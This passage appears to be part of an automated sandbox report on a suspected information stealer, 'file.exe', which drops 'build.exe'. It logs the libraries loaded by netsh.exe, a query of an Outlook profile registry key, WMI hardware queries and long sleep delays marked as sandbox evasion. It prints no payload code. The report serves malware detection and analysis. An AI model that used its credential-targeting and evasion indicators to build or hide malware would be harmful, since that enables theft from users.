                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: build.exe.0.drStatic PE information: 0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCE477E push ds; iretd 2_2_00007FFAACCE477F
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCE214D push ebx; iretd 2_2_00007FFAACCE21CA
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCE00BD pushad ; iretd 2_2_00007FFAACCE00C1
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCE4BD3 pushad ; retf 2_2_00007FFAACCE4BD9
                Source: file.exeStatic PE information: section name: .text entropy: 7.926984592050979
                Source: build.exe.0.dr, zlj0Ou.csHigh entropy of concatenated method names: 'ToString', 'nGK', 'pv', 'no', 'e4VYI', 'iuPLV', 'x6AFVn', 'uC', 'gm', 'lN'
                Source: 0.2.file.exe.3685570.1.raw.unpack, zlj0Ou.csHigh entropy of concatenated method names: 'ToString', 'nGK', 'pv', 'no', 'e4VYI', 'iuPLV', 'x6AFVn', 'uC', 'gm', 'lN'
                Source: 0.2.file.exe.36bd1e8.0.raw.unpack, zlj0Ou.csHigh entropy of concatenated method names: 'ToString', 'nGK', 'pv', 'no', 'e4VYI', 'iuPLV', 'x6AFVn', 'uC', 'gm', 'lN'
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\build.exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\file.exeMemory allocated: A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 26B64FA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 26B7EAC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599764Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599544Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597469Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597359Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597141Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 597031Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596155Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 595826Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeWindow / User API: threadDelayed 2744Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeWindow / User API: threadDelayed 7127Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -599764s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -599544s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -599218s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -599109s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -599000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -598672s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -598344s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -598234s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -598125s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -598015s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -597906s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -597797s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -597687s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -597578s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -597469s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -597359s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -597250s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -597141s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -597031s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -596922s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -596812s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -596703s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -596594s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -596484s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -596375s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -596265s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -596155s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -596047s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -595937s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704Thread sleep time: -595826s >= -30000sJump to behavior
